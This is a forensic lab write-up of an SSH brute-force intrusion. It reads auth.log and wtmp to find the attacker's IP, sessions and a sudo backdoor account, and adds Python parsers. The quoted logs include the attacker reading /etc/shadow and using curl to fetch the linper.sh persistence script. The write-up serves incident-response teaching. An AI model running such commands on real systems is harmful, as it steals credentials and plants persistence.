Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute-force attack?
We can find it easily: one address repeats in the failed and invalid-user SSH attempts throughout the log file.
Mar 6 06:31:37 ip-172-31-35-28 sshd[2361]: Disconnected from invalid user server_adm 65.2.161.68 port 46614 [preauth]
Mar 6 06:31:37 ip-172-31-35-28 sshd[2368]: Received disconnect from 65.2.161.68 port 46676:11: Bye Bye [preauth]
Mar 6 06:31:37 ip-172-31-35-28 sshd[2368]: Disconnected from invalid user server_adm 65.2.161.68 port 46676 [preauth]
Mar 6 06:31:37 ip-172-31-35-28 sshd[2391]: Invalid user svc_account from 65.2.161.68 port 46750
65.2.161.68
The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
We can check the session messages that systemd-logind writes on each login:
grep -i systemd-logind auth.log
Mar 6 06:19:54 ip-172-31-35-28 systemd-logind[411]: New session 6 of user root.
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Removed session 34.
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Removed session 37.
Mar 6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
root
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
In the log captured for the previous question, root logged in at 06:31:40 (session 34) and was logged out in the same second.
That is the brute-forcing tool: once it found a working root password it disconnected, its job done.
Root then logged in again at 06:32:44 (session 37). This is the attacker reusing the discovered credential by hand, and the connection stayed open for almost five minutes.
Let’s confirm whether we guessed correctly.
last -f wtmp -F
cyberjun pts/1 65.2.161.68 Wed Mar 6 01:37:35 2024 gone - no logout
root pts/1 65.2.161.68 Wed Mar 6 01:32:45 2024 - Wed Mar 6 01:37:24 2024 (00:04)
root pts/0 203.101.190.9 Wed Mar 6 01:19:55 2024 gone - no logout
reboot system boot 6.2.0-1018-aws Wed Mar 6 01:17:15 2024 still running
root pts/1 203.101.190.9 Sun Feb 11 05:54:27 2024 - Sun Feb 11 06:08:04 2024 (00:13)
root pts/1 203.101.190.9 Sun Feb 11 05:41:11 2024 - Sun Feb 11 05:41:46 2024 (00:00)
root pts/0 203.101.190.9 Sun Feb 11 05:33:49 2024 - Sun Feb 11 06:08:04 2024 (00:34)
root pts/0 203.101.190.9 Thu Jan 25 06:15:40 2024 - Thu Jan 25 07:34:34 2024 (01:18)
ubuntu pts/0 203.101.190.9 Thu Jan 25 06:13:58 2024 - Thu Jan 25 06:15:12 2024 (00:01)
reboot system boot 6.2.0-1017-aws Thu Jan 25 06:12:17 2024 - Sun Feb 11 06:09:18 2024 (16+23:57)
The hours differ because last renders the epoch timestamps stored in wtmp in the analyst's local time zone (here five hours behind the server's UTC clock), while auth.log is stamped in the server's own time. Setting the TZ environment variable to UTC before running last makes the two agree; otherwise match entries by date and minute.
The last command reads the wtmp login records and confirms what we inferred: the root login from 65.2.161.68 at 06:32:45, one second after sshd's accept in auth.log because the wtmp entry is written when the session is registered.
2024-03-06 06:32:45
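The time-zone shift above is worth seeing at the record level. What follows is an added Python example, not part of the original write-up or the lab files: it builds a small wtmp file from constructed records laid out as glibc's x86_64 struct utmp (384 bytes per record), parses it back, pairs logins with logouts on the same tty the way last does, and renders the rows first in UTC and then at UTC-5 to reproduce the 01:32:45 seen above. The record contents are modelled on the last output quoted in this write-up; the PIDs are made up.

```python
import struct
from datetime import datetime, timedelta, timezone

# glibc x86_64 `struct utmp` (bits/utmp.h): 384 bytes, little-endian, with two
# padding bytes between ut_type and ut_pid. 32-bit and musl layouts differ.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def pack_record(ut_type, pid, line, ut_id, user, host, tv_sec):
    """Build one utmp record; only used here to construct the sample file."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ut_id.encode(),
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0, b"")


def _utc(s):
    return int(datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc).timestamp())


def sample_wtmp():
    """Constructed wtmp modelled on the write-up's `last` output (PIDs made up).
    Epoch seconds are UTC, matching the server's clock."""
    return b"".join([
        pack_record(BOOT_TIME, 0, "~", "~~", "reboot", "6.2.0-1018-aws", _utc("2024-03-06 06:17:15")),
        pack_record(USER_PROCESS, 1210, "pts/0", "ts/0", "root", "203.101.190.9", _utc("2024-03-06 06:19:55")),
        pack_record(USER_PROCESS, 2491, "pts/1", "ts/1", "root", "65.2.161.68", _utc("2024-03-06 06:32:45")),
        pack_record(DEAD_PROCESS, 2491, "pts/1", "ts/1", "", "", _utc("2024-03-06 06:37:24")),
        pack_record(USER_PROCESS, 2667, "pts/1", "ts/1", "cyberjunkie", "65.2.161.68", _utc("2024-03-06 06:37:35")),
    ])


def parse_wtmp(data):
    """Decode every whole 384-byte record; a truncated tail is ignored."""
    recs = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                     "user": _cstr(f[4]), "host": _cstr(f[5]), "ts": f[9]})
    return recs


def login_sessions(recs):
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same tty, as `last` does.
    BOOT_TIME records become 'reboot' rows; logins with no logout record keep None."""
    open_by_line, out = {}, []
    for r in recs:
        if r["type"] == USER_PROCESS:
            s = {"user": r["user"], "line": r["line"], "host": r["host"], "login": r["ts"], "logout": None}
            open_by_line[r["line"]] = s
            out.append(s)
        elif r["type"] == DEAD_PROCESS:
            s = open_by_line.pop(r["line"], None)
            if s:
                s["logout"] = r["ts"]
        elif r["type"] == BOOT_TIME:
            out.append({"user": "reboot", "line": "system boot", "host": r["host"], "login": r["ts"], "logout": None})
    return out


def render(sessions, utc_offset_hours=0):
    """Format rows like `last -F`. `last` prints in the analyst's local zone; the
    offset makes that explicit (0 gives the server's UTC clock, -5 the hours in
    the write-up). Usernames are cut to 8 characters, which is why `last` shows
    'cyberjun'."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    fmt = "%a %b %d %H:%M:%S %Y"
    rows = []
    for s in sessions:
        start = datetime.fromtimestamp(s["login"], tz).strftime(fmt)
        if s["logout"] is None:
            end = "gone - no logout"
        else:
            d = s["logout"] - s["login"]
            end = f"{datetime.fromtimestamp(s['logout'], tz):{fmt}} ({d // 3600:02d}:{d % 3600 // 60:02d})"
        rows.append(f"{s['user'][:8]:<8} {s['line']:<12} {s['host']:<16} {start} - {end}")
    return rows


if __name__ == "__main__":
    # newest first, like `last`; pass 0 instead of -5 to see the server's clock
    for row in reversed(render(login_sessions(parse_wtmp(sample_wtmp())), -5)):
        print(row)
```

To run it against the real artefact, replace sample_wtmp() with the bytes of the collected wtmp file. The root row from 65.2.161.68 reads 06:32:45 at offset 0 and 01:32:45 at offset -5; the stored record is identical, only the rendering changes.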
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Check the log captured for Question 2: the attacker's manual root login at 06:32:44 opened session 37.
37
The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
We already saw it in the log:
cyberjunkie
What is the MITRE ATT&CK sub-technique ID used for persistence?
Looking at the log file, the attacker created a new local user, cyberjunkie, and added it to the sudo group.
This is MITRE ATT&CK Create Account: Local Account, sub-technique T1136.001.
grep -i cyberjunkie auth.log
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar 6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar 6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
Mar 6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar 6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Mar 6 06:39:38 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
From the wtmp login at 06:32:45 to the end of session 37 in auth.log at 06:37:24 is 4 minutes 39 seconds.
279
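Questions 1, 3, 6 and 7 all come down to the same auth.log work: count failed authentications per source address, join each sshd "Accepted" event to the systemd-logind session that opens for the same user (logind lines carry no client address), measure how long each session lived, and look for a useradd followed by a usermod into sudo. The following is an added Python example, not the lab's file or the author's code, that does this over a constructed excerpt: it reuses lines quoted in this write-up and adds a few invented neighbours (the PIDs and ports on those are made up). It assumes 2024 for the year, which syslog timestamps omit. Because it measures from the logind "New session" line at 06:32:44 rather than the wtmp login at 06:32:45, it reports 280 seconds for session 37, one more than the accepted answer of 279.

```python
import re
from collections import Counter
from datetime import datetime

YEAR = 2024  # assumed: syslog timestamps omit the year; taken from the wtmp output

# Constructed auth.log excerpt: lines quoted in the write-up plus invented neighbours
# (PIDs and ports on the invented lines are made up).
SAMPLE_AUTH_LOG = """\
Mar  6 06:19:54 ip-172-31-35-28 sshd[1207]: Accepted publickey for root from 203.101.190.9 port 42825 ssh2
Mar  6 06:19:54 ip-172-31-35-28 systemd-logind[411]: New session 6 of user root.
Mar  6 06:31:33 ip-172-31-35-28 sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:35 ip-172-31-35-28 sshd[2340]: Failed password for root from 65.2.161.68 port 46500 ssh2
Mar  6 06:31:37 ip-172-31-35-28 sshd[2361]: Disconnected from invalid user server_adm 65.2.161.68 port 46614 [preauth]
Mar  6 06:31:37 ip-172-31-35-28 sshd[2391]: Invalid user svc_account from 65.2.161.68 port 46750
Mar  6 06:31:40 ip-172-31-35-28 sshd[2399]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Removed session 34.
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53180 ssh2
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
Mar  6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Removed session 37.
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
"""

# Classic syslog prefix: "Mar  6 06:31:37 host proc[pid]: message" (pid optional)
LINE_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
                     r"(?P<proc>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$")
# sshd failure variants that carry the client address and source port
FAIL_RE = re.compile(r"^(?:Invalid user \S+ from|Failed password for (?:invalid user )?\S+ from|"
                     r"Disconnected from invalid user \S+) (?P<ip>\S+) port (?P<port>\d+)")
ACCEPT_RE = re.compile(r"^Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port \d+")
NEW_SESSION_RE = re.compile(r"^New session (?P<sid>\d+) of user (?P<user>\S+)\.")
END_SESSION_RE = re.compile(r"^(?:Removed session|Session) (?P<sid>\d+)")
USERADD_RE = re.compile(r"^new user: name=(?P<user>[^,]+)")
SUDO_GROUP_RE = re.compile(r"^add '(?P<user>[^']+)' to group 'sudo'")


def parse_auth_log(text, year=YEAR):
    """Split each line into timestamp, host, process name and message."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
            records.append({"ts": ts, "host": m["host"], "proc": m["proc"], "msg": m["msg"]})
    return records


def brute_force_sources(records):
    """Failed connections per client address, counting each (ip, port) once even
    when sshd logs several lines for the same attempt."""
    attempts = {(m["ip"], m["port"]) for r in records
                if r["proc"] == "sshd" and (m := FAIL_RE.match(r["msg"]))}
    return Counter(ip for ip, _port in attempts)


def successful_logins(records):
    """(timestamp, user, method, ip) for every sshd 'Accepted' line, in file order."""
    out = []
    for r in records:
        if r["proc"] == "sshd" and (m := ACCEPT_RE.match(r["msg"])):
            out.append((r["ts"], m["user"], m["method"], m["ip"]))
    return out


def logind_sessions(records):
    """sid -> {user, start, end}; end is the first 'logged out'/'Removed' line for that sid."""
    sess = {}
    for r in records:
        if r["proc"] != "systemd-logind":
            continue
        if m := NEW_SESSION_RE.match(r["msg"]):
            sess[int(m["sid"])] = {"user": m["user"], "start": r["ts"], "end": None}
        elif m := END_SESSION_RE.match(r["msg"]):
            s = sess.get(int(m["sid"]))
            if s and s["end"] is None:
                s["end"] = r["ts"]
    return sess


def attacker_sessions(records, ip):
    """Join each 'Accepted' login from ip to the unused logind session of the same
    user that opens within two seconds of it."""
    sess, used, out = logind_sessions(records), set(), []
    for ts, user, _method, login_ip in successful_logins(records):
        if login_ip != ip:
            continue
        for sid, s in sorted(sess.items()):
            if sid in used or s["user"] != user or not 0 <= (s["start"] - ts).total_seconds() <= 2:
                continue
            used.add(sid)
            dur = (s["end"] - s["start"]).total_seconds() if s["end"] else None
            out.append({"sid": sid, "user": user, "start": s["start"], "end": s["end"], "seconds": dur})
            break
    return out


def first_interactive_session(records, ip, min_seconds=5):
    """First session from ip that outlived a tool's instant login/logout."""
    return next((s for s in attacker_sessions(records, ip)
                 if s["seconds"] is None or s["seconds"] >= min_seconds), None)


def privileged_account_creation(records):
    """(user, created_at, added_to_sudo_at) for accounts created and then put in sudo."""
    created, hits = {}, []
    for r in records:
        if r["proc"] == "useradd" and (m := USERADD_RE.match(r["msg"])):
            created[m["user"]] = r["ts"]
        elif r["proc"] == "usermod" and (m := SUDO_GROUP_RE.match(r["msg"])) and m["user"] in created:
            hits.append((m["user"], created[m["user"]], r["ts"]))
    return hits


if __name__ == "__main__":
    recs = parse_auth_log(SAMPLE_AUTH_LOG)
    ip = brute_force_sources(recs).most_common(1)[0][0]
    print("brute-force source:", ip, "sessions:", attacker_sessions(recs, ip))
    print("manual login:", first_interactive_session(recs, ip), "persistence:", privileged_account_creation(recs))
```

The two-second join window covers the normal gap between sshd's accept and logind registering the session; widen it only if the box was under heavy load. On a real file, read auth.log (and any rotated auth.log.1) into parse_auth_log and keep the year assumption in mind when the log spans New Year.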
The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
We already captured it in Question 6, in the sudo line at 06:39:38:
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh